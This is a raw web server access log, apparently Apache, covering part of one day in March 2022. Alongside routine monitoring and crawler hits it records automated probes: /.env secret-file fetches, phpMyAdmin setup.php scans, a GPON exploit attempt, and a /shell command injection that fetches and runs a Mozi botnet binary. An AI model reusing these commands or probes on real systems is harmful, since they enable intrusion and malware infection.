71.6.232.4 - - [02/Mar/2022:11:50:51 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:11:51:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:52:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
2.57.121.10 - - [02/Mar/2022:11:52:28 +0100] "GET /admin/config.php HTTP/1.1" 404 317 "-" "gbrmss/7.29.0"
75.119.145.87 - - [02/Mar/2022:11:53:00 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [02/Mar/2022:11:53:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:54:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:55:19 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:56:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:11:57:03 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:11:57:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
122.233.43.214 - - [02/Mar/2022:11:57:22 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 319 "-" "Hello, World"
45.137.23.152 - - [02/Mar/2022:11:57:35 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:11:58:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:11:59:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:00:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:01:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
178.32.197.90 - - [02/Mar/2022:12:01:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0"
212.91.246.72 - - [02/Mar/2022:12:02:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:12:02:45 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:12:03:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:04:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:05:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:06:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:07:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.82.47.2 - - [02/Mar/2022:12:07:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:08:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:09:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:10:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
23.251.102.74 - - [02/Mar/2022:12:10:42 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:12:11:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:12:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:13:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.182 - - [02/Mar/2022:12:13:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
45.137.23.152 - - [02/Mar/2022:12:13:29 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
64.62.197.122 - - [02/Mar/2022:12:14:16 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:14:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:15:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:16:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.92 - - [02/Mar/2022:12:16:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:17:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
172.105.85.90 - - [02/Mar/2022:12:17:55 +0100] "GET / HTTP/1.0" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:18:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.49.20.66 - - [02/Mar/2022:12:18:48 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:19:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:20:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:21:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
200.18.116.72 - - [02/Mar/2022:12:22:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:12:22:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:12:23:08 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:12:23:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:24:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:25:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:12:25:49 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:12:26:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.77.162.30 - - [02/Mar/2022:12:26:34 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:27:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:28:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:12:28:39 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
212.91.246.72 - - [02/Mar/2022:12:29:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:30:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
190.14.216.198 - - [02/Mar/2022:12:30:23 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
64.62.197.32 - - [02/Mar/2022:12:31:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:31:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:32:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:33:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.137.23.152 - - [02/Mar/2022:12:33:23 +0100] "GET /dispatch.asp HTTP/1.1" 404 317 "-" "Mozilla/5.0 (iPad; CPU OS 7_1_2 like Mac OS X; en-US) AppleWebKit/531.5.2 (KHTML, like Gecko) Version/4.0.5 Mobile/8B116 Safari/6531.5.2"
65.49.20.66 - - [02/Mar/2022:12:33:37 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:34:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
118.184.177.100 - - [02/Mar/2022:12:34:44 +0100] "GET / HTTP/1.1" 200 1229 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
172.105.85.90 - - [02/Mar/2022:12:34:49 +0100] "POST /sdk HTTP/1.1" 404 308 "-" "\"Mozilla/5.0"
212.91.246.72 - - [02/Mar/2022:12:35:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:36:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
27.47.43.97 - - [02/Mar/2022:12:37:01 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 310 "-" "Hello, world"
212.91.246.72 - - [02/Mar/2022:12:37:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/Mar/2022:12:38:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.141.6.170 - - [02/Mar/2022:12:38:55 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [02/Mar/2022:12:38:55 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:12:39:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
65.141.6.170 - - [02/Mar/2022:12:40:15 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
65.141.6.170 - - [02/Mar/2022:12:40:16 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [02/Mar/2022:12:40:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.40 - - [02/Mar/2022:12:40:34 +0100] "GET http://212.91.246.81:80/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:34 +0100] "GET http://212.91.246.81:80/phpmyadmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:35 +0100] "GET http://212.91.246.81:80/pma/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:35 +0100] "GET http://212.91.246.81:80/myadmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:36 +0100] "GET http://212.91.246.81:80/MyAdmin/scripts/setup.php HTTP/1.0" 404 330 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:36 +0100] "GET http://212.91.246.81:80/PHPMYADMIN/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:37 +0100] "GET http://212.91.246.81:80/mysqladmin/scripts/setup.php HTTP/1.0" 404 333 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:38 +0100] "GET http://212.91.246.81:80/SQL/scripts/setup.php HTTP/1.0" 404 326 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:38 +0100] "GET http://212.91.246.81:80/phpadmin/scripts/setup.php HTTP/1.0" 404 331 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:39 +0100] "GET http://212.91.246.81:80/phpm/scripts/setup.php HTTP/1.0" 404 327 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:39 +0100] "GET http://212.91.246.81:80/phpmyadmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:40 +0100] "GET http://212.91.246.81:80/phpMyAdmin1/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:40 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:41 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:42 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:42 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:43 +0100] "GET http://212.91.246.81:80/php-my-admin/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:44 +0100] "GET http://212.91.246.81:80/admin/pma/scripts/setup.php HTTP/1.0" 404 332 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:44 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2/scripts/setup.php HTTP/1.0" 404 335 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:45 +0100] "GET http://212.91.246.81:80/typo3/phpmyadmin/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:45 +0100] "GET http://212.91.246.81:80/web/phpMyAdmin/scripts/setup.php HTTP/1.0" 404 337 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:46 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:47 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:47 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:48 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.0/scripts/setup.php HTTP/1.0" 404 340 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:49 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:50 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.10.2.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:51 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.0.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:51 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1.0/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:52 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1.1/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:53 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1.2/scripts/setup.php HTTP/1.0" 404 342 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:53 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.11.1-all-languages/scripts/setup.php HTTP/1.0" 404 354 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:54 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.2.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:55 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.2.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:55 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:56 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.5-rc1config/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:56 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.5-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:57 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.5.5-rc2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:58 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.1-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:58 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.1-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:59 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.4-pl3/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:40:59 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.4-pl4/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:00 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.4-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:01 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:01 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:02 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.6.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:02 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.0-beta1/scripts/setup.php HTTP/1.0" 404 345 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:03 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.0-pl1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:04 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.0-pl2/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:04 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:05 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:06 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:06 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.7.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:07 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:07 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.2.3/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:08 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:09 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.3/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:09 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.4/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:10 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.5/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:10 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.6/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:11 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.7/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:11 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.8/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:12 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.8.9/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:13 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.0.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:13 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.0.2/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:14 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.0-rc1/scripts/setup.php HTTP/1.0" 404 343 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:14 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.0/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:15 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.1/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:16 +0100] "GET http://212.91.246.81:80/phpMyAdmin-2.9.2/scripts/setup.php HTTP/1.0" 404 339 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:16 +0100] "GET http://212.91.246.81:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:17 +0100] "GET http://212.91.246.81:80/phpMyAdmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:17 +0100] "GET http://212.91.246.81:80/phpmyadmin2/scripts/setup.php HTTP/1.0" 404 334 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:18 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.0" 404 355 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:18 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.0.0-rc1-english/scripts/setup.php HTTP/1.0" 404 351 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:19 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.0.1.0-english/scripts/setup.php HTTP/1.0" 404 349 "-" "-"
209.141.61.40 - - [02/Mar/2022:12:41:20 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.0.1.0/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
212.91.246.72 - - [02/Mar/2022:12:41:20 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.61.40 - - [02/Mar/2022:12:41:20 +0100] "GET http://212.91.246.81:80/phpMyAdmin-3.0.1.1/scripts/setup.php HTTP/1.0" 404 341 "-" "-"
